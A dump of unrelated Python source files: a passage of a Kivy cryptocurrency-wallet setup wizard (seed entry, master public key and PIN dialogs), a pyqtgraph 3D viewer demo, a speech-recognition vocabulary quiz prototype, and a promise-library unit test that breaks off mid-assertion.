cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def password_dialog(self, message, callback):
popup = PasswordDialog()
popup.init(message, callback)
popup.open()
def request_password(self, run_next, force_disable_encrypt_cb=False):
def callback(pin):
if pin:
self.run('confirm_password', pin, run_next)
else:
run_next(None, None)
self.password_dialog('Choose a PIN code', callback)
def confirm_password(self, pin, run_next):
def callback(conf):
if conf == pin:
run_next(pin, False)
else:
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
self.password_dialog('Confirm your PIN code', callback)
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
test_viewer.py
|
#!/usr/bin/env python3
"""
Quick and simple script to see if the viewer is functional.
FIXME(ycho): Not an actual test, more like an example.
"""
import time
import numpy as np
import functools
from abc import abstractmethod, ABC
import multiprocessing as mp
from tqdm import tqdm
import threading
import logging
from typing import Tuple, Dict, List, Callable, Any
import pyqtgraph as pg
import pyqtgraph.opengl as gl
from pyqtgraph.Qt import QtGui, QtCore
from phonebot.core.common.queue_listener import QueueListener
from phonebot.vis.viewer.viewer_base import ViewerState
from phonebot.vis.viewer.viewer_base import HandleHelper
from phonebot.vis.viewer._pyqtgraph import PyqtViewer3D
from phonebot.vis.viewer._pyqtgraph.pyqtgraph_handlers import LineStripHandler
from phonebot.vis.viewer.async_viewer import AsyncViewer
class KeyCameraHandler:
def __init__(self, viewer: PyqtViewer3D):
self.viewer = viewer
def __call__(self, dy, dz):
self.viewer.widget_.orbit(dz, dy)
def main():
logging.basicConfig(level=logging.INFO)
use_async = True
if use_async:
viewer = AsyncViewer(PyqtViewer3D)
else:
viewer = PyqtViewer3D()
handler = HandleHelper(viewer)
viewer.register('camera', KeyCameraHandler)
viewer.register('line_strip', LineStripHandler)
def on_mouse(data):
print('on_mouse --------- data = {}'.format(data))
def on_key(data):
c = data[0]
if c in [ord(x) for x in 'WASD']:
c = chr(c).lower()
dz, dy = 0, 0
if c == 'w':
dy = +5
if c == 's':
dy = -5
if c == 'a':
dz = -5
if c == 'd':
dz = +5
handler.camera(dy=dy, dz=dz)
if c == ord('Q'):
viewer.stop()
viewer.on_mouse(on_mouse)
viewer.on_key(on_key)
def draw_stuff():
for _ in tqdm(range(1024)):
if viewer.state() == ViewerState.CLOSED:
break
md = gl.MeshData.sphere(rows=4, cols=8)
md.setVertexColors(md.vertexes())
with handler.collect():
handler.line(pos=np.random.uniform(size=(1, 2, 3)))
handler.point(pos=np.random.uniform(size=(32, 3)))
handler.mesh(meshdata=md)
handler.line_strip(pos=np.random.uniform(size=(32, 3)))
time.sleep(0.01)
try:
viewer.start()
except KeyboardInterrupt:
viewer.stop()
t = threading.Thread(target=draw_stuff)
t.start()
try:
t.join()
finally:
viewer.stop()
if __name__ == '__main__':
main()
|
prototype.py
|
import nltk
from nltk.tokenize import RegexpTokenizer
import speech_recognition as SpeechRecog
import pyaudio
from random_word import RandomWords
import random
import time
import threading
init_rec = SpeechRecog.Recognizer()
score = 0
num_ques = 0
def word_filter(string):
# removes punctuation
tokenizer = RegexpTokenizer(r'\w+')
# makes the string into list
string_list_with_char = tokenizer.tokenize(string)
# remove single letter
string_list = [w for w in string_list_with_char if len(w) > 1]
def is_noun(pos): return pos[:2] == 'NN'
# take only nouns
nouns = [word for (word, pos) in nltk.pos_tag(string_list) if is_noun(pos)]
# remove duplicate
string_filtered = []
for i in nouns:
if (nouns.count(i) > 1 and (i not in string_filtered) or nouns.count(i) == 1):
string_filtered.append(i)
return string_filtered
def quiz(string):
global score
global num_ques
ran_word = random_words()
minimize = [words for words in string if len(words) > 5]
# taking a random word from the correct answer
random_correct = random.choice(minimize)
# print(random_correct)
# appending random word from the wrong answer and correct answer
options = []
for i in ran_word:
options.append(i)
options.append(random_correct)
# shuffling all the options
random.shuffle(options)
# print(options)
op1 = options[0]
op2 = options[1]
op3 = options[2]
op4 = options[3]
print("Choose the word which was mentioned by the professor:")
print("1.", options[0], "2.", options[1], "3.", options[2], "4.", options[3])
user_choice = input("Enter option:")
if user_choice == "1":
ans = op1
elif user_choice == "2":
ans = op2
elif user_choice == "3":
ans = op3
elif user_choice == "4":
ans = op4
else:
print("Inavlid option")
if ans == random_correct:
print("Correct option")
score += 1
num_ques += 1
else:
print("Wrong option")
num_ques += 1
def random_words():
r = RandomWords()
words = r.get_random_words()
words1 = words[:3]
return words1
def main():
while True:
words = []
for i in range(1):
with SpeechRecog.Microphone() as source:
audio_data = init_rec.record(source, duration=10)
try:
text = init_rec.recognize_google(audio_data)
except:
text = ''
text_filtered = word_filter(text)
for j in text_filtered:
words.append(j)
thread_quiz = threading.Thread(target=quiz, args=(words, ))
thread_quiz.start()
thread_quiz.join(timeout=10)
print(score)
if __name__ == '__main__':
main()
|
test_promise.py
|
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import sys
import threading
import time
import unittest
import weakref
from queue import Queue
from mars.tests.core import create_actor_pool
from mars.utils import build_exc_info
from mars import promise
class ServeActor(promise.PromiseActor):
def __init__(self):
super().__init__()
self._result_list = []
@promise.reject_on_exception
def serve(self, value, delay=None, accept=True, raises=False, callback=None):
self.ctx.sleep(delay if delay is not None else 0.1)
if raises:
raise ValueError('User-induced error')
self._result_list.append(value)
if callback:
self.tell_promise(callback, value, _accept=accept)
def get_result(self):
return self._result_list
def clear_result(self):
self._result_list = []
class PromiseTestActor(promise.PromiseActor):
def __init__(self):
super().__init__()
self._finished = False
def get_finished(self):
return self._finished
def reset_finished(self):
self._finished = False
def test_normal(self):
self._finished = False
assert self.promise_ref().uid == self.uid
ref = self.promise_ref('ServeActor')
assert ref.__getattr__('_caller') is self
p = ref.serve(0, _promise=True)
ref = self.promise_ref(self.ctx.actor_ref('ServeActor'))
for _ in range(10):
p = p.then(lambda v: ref.serve(v + 1, _promise=True))
p.then(lambda *_: setattr(self, '_finished', True))
def test_error_raise(self):
self._finished = False
ref = self.promise_ref('ServeActor')
ref.serve(0, raises=True, _promise=True) \
.then(lambda v: ref.serve(v + 1, _promise=True)) \
.catch(lambda *_: ref.serve(-1, _promise=True)) \
.then(lambda *_: setattr(self, '_finished', True))
def test_spawn(self, raises=False):
def _task():
self.ctx.sleep(0.5)
if raises:
raise SystemError
ref = self.promise_ref('ServeActor')
promise.all_([self.spawn_promised(_task) for _ in range(4)]) \
.then(lambda *_: ref.serve(0, delay=0, _promise=True)) \
.catch(lambda *exc: ref.serve(exc[0].__name__, delay=0, _promise=True)) \
.then(lambda *_: setattr(self, '_finished', True))
def test_all_promise(self):
self._finished = False
ref = self.promise_ref('ServeActor')
promises = []
def subsequent_all(*_):
def func(idx, *_, **kw):
return ref.serve(idx, _promise=True, **kw)
for idx in range(10):
promises.append(func(idx * 2).then(functools.partial(func, idx * 2 + 1)))
return promise.all_(promises)
ref.serve(-128, _promise=True) \
.then(subsequent_all) \
.then(lambda *_: ref.serve(127, _promise=True)) \
.then(lambda *_: setattr(self, '_finished', True))
def test_timeout(self):
self._finished = False
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _timeout=1, _promise=True) \
.catch(_rejecter) \
.then(lambda *_: setattr(self, '_finished', True))
def test_no_timeout(self):
self._finished = False
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=1, _timeout=2, _promise=True) \
.catch(_rejecter) \
.then(lambda *_: setattr(self, '_finished', True))
def test_ref_reject(self):
from mars.errors import WorkerProcessStopped
self._finished = False
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _promise=True) \
.catch(_rejecter) \
.then(lambda *_: setattr(self, '_finished', True))
self.reject_promise_refs([ref], *build_exc_info(WorkerProcessStopped))
def test_addr_reject(self):
from mars.errors import WorkerDead
self._finished = False
ref = self.promise_ref('ServeActor', address=self.address)
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _promise=True) \
.catch(_rejecter) \
.then(lambda *_: setattr(self, '_finished', True))
self.reject_dead_endpoints([self.address], *build_exc_info(WorkerDead))
def test_closure_refcount(self, content=''):
ref = self.promise_ref('ServeActor', address=self.address)
class Intermediate(object):
def __init__(self, s):
self.str = s
new_content = Intermediate(f'Content: {content}')
def _acceptor(*_):
ref.serve(weakref.ref(new_content))
return f'Processed: {new_content.str}'
ref.serve(0, delay=0.5, _promise=True) \
.then(_acceptor) \
.then(lambda *_: setattr(self, '_finished', True))
def _raise_exception(exc):
raise exc
def wait_test_actor_result(ref, timeout):
import gevent
t = time.time()
while not ref.get_finished():
gevent.sleep(0.01)
if time.time() > t + timeout:
raise TimeoutError
@unittest.skipIf(sys.platform == 'win32', 'does not run in windows')
class Test(unittest.TestCase):
def testPromise(self):
promises = weakref.WeakValueDictionary()
req_queue = Queue()
value_list = []
time_unit = 0.1
def test_thread_body():
while True:
idx, v, success = req_queue.get()
if v is None:
break
value_list.append(('thread_body', v))
time.sleep(time_unit)
promises[idx].step_next([(v,), dict(_accept=success)])
try:
thread = threading.Thread(target=test_thread_body)
thread.daemon = True
thread.start()
def gen_promise(value, accept=True):
value_list.append(('gen_promise', value))
p = promise.Promise()
promises[p.id] = p
req_queue.put((p.id, value + 1, accept))
return p
# simple promise call
value_list = []
p = gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v))
p.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3)]
)
# continue accepted call with then
value_list = []
p.then(lambda *_: gen_promise(0)) \
.then(lambda v: gen_promise(v)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2)]
)
# immediate error
value_list = []
p = promise.finished() \
.then(lambda *_: 5 / 0)
p.catch(lambda *_: gen_promise(0)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1)]
)
# chained errors
value_list = []
p = promise.finished(_accept=False) \
.catch(lambda *_: 1 / 0) \
.catch(lambda *_: 2 / 0) \
.catch(lambda *_: gen_promise(0)) \
.catch(lambda *_: gen_promise(1))
p.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1)]
)
# continue error call
value_list = []
p = gen_promise(0) \
.then(lambda *_: 5 / 0) \
.then(lambda *_: gen_promise(2))
time.sleep(0.5)
value_list = []
p.catch(lambda *_: gen_promise(0)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v).then(lambda x: x + 1)) \
.then(lambda v: gen_promise(v)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 3), ('thread_body', 4)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False).then(lambda x: x + 1)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('catch', 2)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: v + 1) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 3), ('thread_body', 4),
('catch', 4)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v), lambda v: gen_promise(v + 1, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('gen_promise', 4), ('thread_body', 5),
('catch', 5)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v), lambda v: _raise_exception(ValueError)) \
.catch(lambda *_: value_list.append(('catch',))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', )]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: gen_promise(v, False)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('gen_promise', 3), ('thread_body', 4),
('gen_promise', 4), ('thread_body', 5)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('catch', 2)]
)
finally:
self.assertDictEqual(promise._promise_pool, {})
req_queue.put((None, None, None))
def testPromiseActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_normal()
wait_test_actor_result(test_ref, 10)
self.assertListEqual(serve_ref.get_result(), list(range(11)))
serve_ref.clear_result()
test_ref.reset_finished()
test_ref.test_error_raise()
wait_test_actor_result(test_ref, 10)
self.assertListEqual(serve_ref.get_result(), [-1])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testAll(self):
promises = weakref.WeakValueDictionary()
req_queue = Queue()
value_list = []
time_unit = 0.1
def test_thread_body():
while True:
idx, v, success = req_queue.get()
if v is None:
break
value_list.append(('thread_body', v))
time.sleep(time_unit)
promises[idx].step_next([(v,), dict(_accept=success)])
def gen_promise(value, accept=True):
p = promise.Promise()
promises[p.id] = p
req_queue.put((p.id, value + 1, accept))
return p
try:
thread = threading.Thread(target=test_thread_body)
thread.daemon = True
thread.start()
value_list = []
promise.all_([]).then(lambda: value_list.append(('all', 0))).wait()
self.assertListEqual(value_list, [('all', 0)])
value_list = []
prior_promises = [gen_promise(idx) for idx in range(4)]
promise.all_(prior_promises).then(lambda: value_list.append(('all', 5))).wait()
del prior_promises
self.assertListEqual(
value_list,
[('thread_body', 1), ('thread_body', 2), ('thread_body', 3),
('thread_body', 4), ('all', 5)]
)
value_list = []
prior_promises = [gen_promise(idx, bool((idx + 1) % 2)) for idx in range(4)]
promise.all_(prior_promises).then(
lambda: value_list.append(('all', 5)),
lambda *_: value_list.append(('all_catch', 5)),
).wait()
del prior_promises
expected = [('thread_body', 1), ('thread_body', 2), ('all_catch', 5)]
self.assertListEqual(value_list[:len(expected)], expected)
time.sleep(0.5)
def _gen_all_promise(*_):
prior_promises = [gen_promise(idx, bool((idx + 1) % 2)) for idx in range(4)]
return promise.all_(prior_promises)
value_list = []
gen_promise(0) \
.then(lambda *_: value_list.append(('pre_all', 0))) \
.then(_gen_all_promise) \
.then(lambda v: gen_promise(v)) \
.then(
lambda: value_list.append(('all', 5)),
lambda *_: value_list.append(('all_catch', 5)),
).wait()
expected = [('thread_body', 1), ('pre_all', 0), ('thread_body', 1), ('thread_body', 2), ('all_catch', 5)]
self.assertListEqual(value_list[:len(expected)], expected)
time.sleep(0.5)
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
req_queue.put((None, None, None))
def testSpawnPromisedActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
start_time = time.time()
test_ref.test_spawn()
self.assertLess(time.time() - start_time, 0.5)
wait_test_actor_result(test_ref, 30)
self.assertEqual(serve_ref.get_result(), [0])
self.assertGreaterEqual(time.time() - start_time, 0.5)
self.assertLess(time.time() - start_time, 1)
serve_ref.clear_result()
test_ref.reset_finished()
start_time = time.time()
test_ref.test_spawn(raises=True)
self.assertLess(time.time() - start_time, 0.5)
wait_test_actor_result(test_ref, 30)
self.assertEqual(serve_ref.get_result(), ['SystemError'])
self.assertGreaterEqual(time.time() - start_time, 0.5)
self.assertLess(time.time() - start_time, 1)
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testAllActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_all_promise()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(
serve_ref.get_result(),
